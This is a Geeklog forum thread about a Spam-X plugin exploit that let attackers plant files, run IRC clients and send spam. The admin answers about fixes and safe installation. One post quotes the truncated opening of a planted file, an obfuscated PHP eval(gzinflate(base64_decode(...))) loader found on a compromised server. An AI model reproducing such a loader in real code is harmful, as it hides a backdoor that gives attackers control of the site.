Welcome to Geeklog, Anonymous Saturday, December 21 2024 @ 10:16 pm EST
Geeklog Forums
Spam-X Exploit
Rictor
Anonymous
The file spamx/BlackList.Examine.class.php was being maliciously exploited to start up irc clients and plant other malicious php files on my server. I just upgrade from 1.4.0 to the latest version of Geeklog after deleting the malicious files, and I was wondering if this exploit was corrected in the new version or not? A quick search of Google found that the exploit is being discussed on several hacking sites.
12
11
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
This issue was fixed with the release of Geeklog 1.4.0sr4 on June 30th, 2006.
It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.
As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.
bye, Dirk
It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.
As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.
bye, Dirk
11
11
Quote
BMcDonald
Anonymous
Hi,
I just got a notice form my provider that this exploit happened on my system. I'm running 1.4.1, and I I think I did do the upgrade with fantasico.
I've read some problems with upgrading spamx. I'm running 1.1.0
Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post the said there's a 1.5.2 version. Any idea where that one is?
Thanks
I just got a notice form my provider that this exploit happened on my system. I'm running 1.4.1, and I I think I did do the upgrade with fantasico.
I've read some problems with upgrading spamx. I'm running 1.1.0
Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post the said there's a 1.5.2 version. Any idea where that one is?
Thanks
11
7
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
radu
Anonymous
I did an upgrade and my spamx was corupted letting hakkers to send thousands of Email out I also got penalized with $250 for one of my IP's that was blacklisted. Is Spamx safe or not? can the site run without?
this is the message i got from my server provider:
http://cluj-napoca.com/plugins/spamx/home.php
that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.
root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("vRr9V9u29udxTv8HTWPgNOQT6FYSp+sorN0bpSts77zT9nAUW0k0HDu1ZCBr+d/fvZJsK4lDaV/f/AOxdD91db8k82BDjDwhJVfe5sWr07PzN9ssUCKJt9+RGql9eLCxacb+MrgHoCmXko15AbNjA+RTJqJISFWAixmDMEqTaQHDgZlO+Syaq6SA2LEBymz4Fw9KlnacU7IoZlPukJoJK09E/GIBjjMGFiSx4rFS81kJdeY00oMNYp984cQnWRrxOEhC7uWTtV4lIk/5+ALXwgLu0e/3D7/vdukOoebnE8QgJeT3kSJVKmYyYnLCZTWutdgKrp1H3Ftc65PBg43+RE0j+CX9CWchvpC+Eirig03y6vkrcsKkhD9gxZRs9lsGpLG+bTTIr5lU5EzNI068n/lYxDXSaBiw1LPa2lTxG9UKpKQaRIZJOCcfjMJDFlyO0ySLw0aQREl68F1bP3Y9I9igxohNRTQ/uOJpyGLmQqT4mx90OnaqYDAaFQxu9Y+IZ5laL/LYPBUy/7y3TEdpIxMXzcA9PyW2QipLBYu+RCaZpTyXt95097Rav6X3sHq3j+Kwpjcb0LTnEI2mt3Y41jx9u0BtCd8KIJGIL4sBWxhduSPjKv
.....
That is not what normal code is supposed to look like.
this is the message i got from my server provider:
http://cluj-napoca.com/plugins/spamx/home.php
that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.
Text Formatted Code
root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("vRr9V9u29udxTv8HTWPgNOQT6FYSp+sorN0bpSts77zT9nAUW0k0HDu1ZCBr+d/fvZJsK4lDaV/f/AOxdD91db8k82BDjDwhJVfe5sWr07PzN9ssUCKJt9+RGql9eLCxacb+MrgHoCmXko15AbNjA+RTJqJISFWAixmDMEqTaQHDgZlO+Syaq6SA2LEBymz4Fw9KlnacU7IoZlPukJoJK09E/GIBjjMGFiSx4rFS81kJdeY00oMNYp984cQnWRrxOEhC7uWTtV4lIk/5+ALXwgLu0e/3D7/vdukOoebnE8QgJeT3kSJVKmYyYnLCZTWutdgKrp1H3Ftc65PBg43+RE0j+CX9CWchvpC+Eirig03y6vkrcsKkhD9gxZRs9lsGpLG+bTTIr5lU5EzNI068n/lYxDXSaBiw1LPa2lTxG9UKpKQaRIZJOCcfjMJDFlyO0ySLw0aQREl68F1bP3Y9I9igxohNRTQ/uOJpyGLmQqT4mx90OnaqYDAaFQxu9Y+IZ5laL/LYPBUy/7y3TEdpIxMXzcA9PyW2QipLBYu+RCaZpTyXt95097Rav6X3sHq3j+Kwpjcb0LTnEI2mt3Y41jx9u0BtCd8KIJGIL4sBWxhduSPjKv
.....
That is not what normal code is supposed to look like.
11
11
Quote
Ouch - there's an embarrassing bug in our inclusion protection for some of the Spam-X modules, so that old exploit still works 
Sorry about that. We'll get that fixed ASAP.
In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.
bye, Dirk
Sorry about that. We'll get that fixed ASAP.In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.
bye, Dirk
10
12
Quote
All times are EST. The time is now 10:16 pm.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content